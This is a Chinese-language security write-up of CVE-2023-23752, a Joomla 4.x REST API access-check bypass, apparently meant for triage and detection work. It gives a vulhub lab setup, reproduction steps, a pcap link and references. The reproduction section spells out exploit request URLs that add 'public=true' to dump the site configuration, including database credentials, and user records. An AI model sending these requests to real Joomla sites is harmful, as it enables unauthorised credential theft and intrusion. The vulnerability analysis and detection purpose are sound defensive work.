CVE-2023-23752-Joomla权限绕过漏洞研判分析

CVE-2023-23752-Joomla权限绕过漏洞分析

简介

Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。

在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。

参考链接:

  • https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
  • https://xz.aliyun.com/t/12175
  • https://vulncheck.com/blog/joomla-for-rce

检测日志

HTTP.log

测试复现

漏洞环境

漏洞环境参考vulhub进行部署模拟

执行如下命令启动一个Joomla 4.2.7:

docker-compose up -d

服务启动后,访问http://your-ip:8080即可查看到Joomla页面。

漏洞复现

这个漏洞是由于错误的属性覆盖导致的,攻击者可以通过在访问Rest API时传入参数public=true来绕过权限校验。

比如,访问下面这个链接即可读取所有配置项,包括数据库连接用户名和密码:

http://your-ip:8080/api/index.php/v1/config/application?public=true

CVE-2023-23752-Joomla权限绕过漏洞研判分析_第1张图片
如果不添加public=true,则访问会被拒绝。

访问下面这个链接即可读取所有用户信息,包含邮箱等:

http://your-ip:8080/api/index.php/v1/users?public=true

CVE-2023-23752-Joomla权限绕过漏洞研判分析_第2张图片

测试留痕


流量包:https://github.com/12306Br0/Security-operation-book/blob/master/Web/2023/CVE-2023-23752/CVE-2023-23752.pcap

检测规则/思路

对请求路径及返回内容进行重点关注,研判分析时要根据url路径内容,结合返回信息+状态码进行研判。

参考推荐

MITRE-ATT&CK-T1190

https://attack.mitre.org/techniques/T1190/

Joomla权限绕过漏洞(CVE-2023-23752)

https://github.com/vulhub/vulhub/blob/6e9b1c1acd60529384a5751ea9de4dae595259c6/joomla/CVE-2023-23752/README.zh-cn.md?plain=1

Joomla未授权访问漏洞|CVE-2023-23752复现及修复

https://www.cnblogs.com/xiaoyunxiaogang/p/17219281.html

你可能感兴趣的:(web安全)